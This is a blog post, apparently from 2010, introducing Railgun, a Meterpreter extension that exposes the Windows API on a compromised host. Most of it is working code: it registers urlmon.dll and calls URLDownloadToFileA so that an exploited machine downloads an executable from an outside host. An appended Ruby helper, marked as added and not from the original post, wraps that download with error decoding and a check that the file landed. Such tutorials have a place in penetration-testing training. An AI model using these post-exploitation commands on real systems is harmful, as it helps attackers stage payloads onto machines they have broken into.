Wednesday, July 14, 2010

Railgun - WinAPI for Meterpreter


My first post on the Metasploit Framework! Most of us will be aware of the recent release of Railgun, a Meterpreter extension. Railgun was released by "Patrick HVE" and has already won most of the hearts out there (at least mine :)

What is Railgun? Railgun is a Meterpreter extension written in Ruby. It gives you the whole Windows API on the Meterpreter-controlled system: you can call any exported function of any DLL that is already on the target or that you have uploaded there. The calls run inside the Meterpreter process, so they execute with that process's token and are as visible to host monitoring as any other API call it makes.

Here is an additional API function I quickly added to the already compiled Railgun definition list (which has some 1000 entries).

# In a Meterpreter irb session, railgun is client.railgun
railgun.add_dll('urlmon','urlmon.dll')   # friendly name, then the DLL name on the target
railgun.add_function('urlmon','URLDownloadToFileA','DWORD',[   # returns an HRESULT (0 = S_OK)
["DWORD","pcaller","in"],      # IUnknown* of the caller; pass 0
["PCHAR","szURL","in"],        # URL to fetch
["PCHAR","szFileName","in"],   # destination path on the target
["DWORD","Reserved","in"],     # must be 0
["DWORD","lpfnCB","in"],       # IBindStatusCallback*; pass 0
])

What we have done is register urlmon.dll under the name urlmon and import the function URLDownloadToFileA for our use. Once you have a Meterpreter session on an exploited system, you can call URLDownloadToFileA to make the target itself fetch any file from the internet, like this:

meterpreter > irb
>> client.core.use("railgun")
=> true
>> client.railgun.urlmon.URLDownloadToFileA(0, "http://www.example.com/metasploit.exe", 'C:\metasploit.exe', 0, 0)
=> {"GetLastError"=>0, "return"=>0}

which downloads metasploit.exe from http://www.example.com to the root of the C: drive. Note the single quotes around the destination path: in a Ruby double-quoted string "C:\metasploit.exe" the \m escape silently drops the backslash and you end up writing C:metasploit.exe, a path relative to the current directory on C:. The "return" value is an HRESULT (0 is S_OK, anything with the top bit set is a failure code), and because urlmon rides on WinINet the request uses the logged-on user's proxy settings and may leave a copy of the file in the IE cache.
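As an added example (my own helper, not code from the original post or from the Metasploit project), here is the same procedure wrapped in a Ruby function you can paste into a Meterpreter irb: it registers urlmon.dll only once per session, rejects the double-quote path mistake above, calls URLDownloadToFileA, and decodes the HRESULT instead of trusting a zero. It assumes a live session object `client` with railgun and stdapi loaded, that `client.railgun.known_dll_names` lists registered DLL names (as in current Railgun) and that `client.fs.file.exist?` is available from stdapi; the HRESULT table covers the urlmon codes I know, and everything except the session calls runs offline.

```ruby
# Added example, not part of the original post or of Metasploit itself.
# Assumes a Meterpreter `client` with the railgun and stdapi extensions loaded.

# HRESULTs URLDownloadToFile returns in practice. Railgun declares the return
# as a DWORD, so failures arrive as unsigned 32-bit values (e.g. 2148270088).
URLMON_HRESULTS = {
  0x00000000 => 'S_OK',
  0x8007000E => 'E_OUTOFMEMORY',
  0x800C0002 => 'INET_E_INVALID_URL',
  0x800C0005 => 'INET_E_RESOURCE_NOT_FOUND',
  0x800C0007 => 'INET_E_DATA_NOT_AVAILABLE',
  0x800C0008 => 'INET_E_DOWNLOAD_FAILURE',
}.freeze

# Turn the unsigned DWORD Railgun hands back into a readable HRESULT string.
def describe_hresult(value)
  hr = value & 0xFFFFFFFF
  format('0x%08X (%s)', hr, URLMON_HRESULTS.fetch(hr, 'unknown HRESULT'))
end

# Bit 31 of an HRESULT is the severity bit; set means failure.
def hresult_ok?(value)
  (value & 0x80000000).zero?
end

# Railgun parameter spec for URLDownloadToFileA (same shape as in the post).
URLMON_FUNCTION = ['URLDownloadToFileA', 'DWORD', [
  ['DWORD', 'pCaller',    'in'],   # IUnknown* of the caller; 0 from a script
  ['PCHAR', 'szURL',      'in'],   # URL to fetch
  ['PCHAR', 'szFileName', 'in'],   # destination path on the target
  ['DWORD', 'dwReserved', 'in'],   # must be 0
  ['DWORD', 'lpfnCB',     'in'],   # IBindStatusCallback*; 0
]].freeze

# Register urlmon once per session; add_dll raises if the name already exists.
# known_dll_names is assumed to be the name-list accessor of the Railgun object.
def ensure_urlmon(railgun)
  return if railgun.known_dll_names.include?('urlmon')
  railgun.add_dll('urlmon', 'urlmon.dll')
  railgun.add_function('urlmon', *URLMON_FUNCTION)
end

# Download `url` to `dest` on the target and report what actually happened.
# Pass `dest` single-quoted or with doubled backslashes: "C:\metasploit.exe"
# in Ruby double quotes loses the backslash and becomes a relative path.
def urlmon_download(client, url, dest)
  unless dest =~ /\A[A-Za-z]:\\/
    raise ArgumentError, "dest must be an absolute Windows path, got #{dest.inspect}"
  end
  ensure_urlmon(client.railgun)
  res = client.railgun.urlmon.URLDownloadToFileA(0, url, dest, 0, 0)
  status = {
    ok: hresult_ok?(res['return']),
    hresult: describe_hresult(res['return']),
    last_error: res['GetLastError'],
  }
  # S_OK alone does not prove the file landed (AV quarantine, redirects to an
  # error page, etc.); confirm through stdapi before relying on it.
  status[:exists] = status[:ok] && client.fs.file.exist?(dest)
  status
end

# Usage inside a Meterpreter irb:
#   urlmon_download(client, 'http://www.example.com/metasploit.exe', 'C:\metasploit.exe')
```

The returned hash is what you act on: `:ok` is the decoded HRESULT, `:last_error` is the thread's GetLastError that Railgun captures for you, and `:exists` is the only field that says the file is really there.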

To summarize, Railgun is a powerful tool for executing WinAPI functions on the target machine. Thanks to the author for releasing such a wonderful extension :)

-binaryhax0r
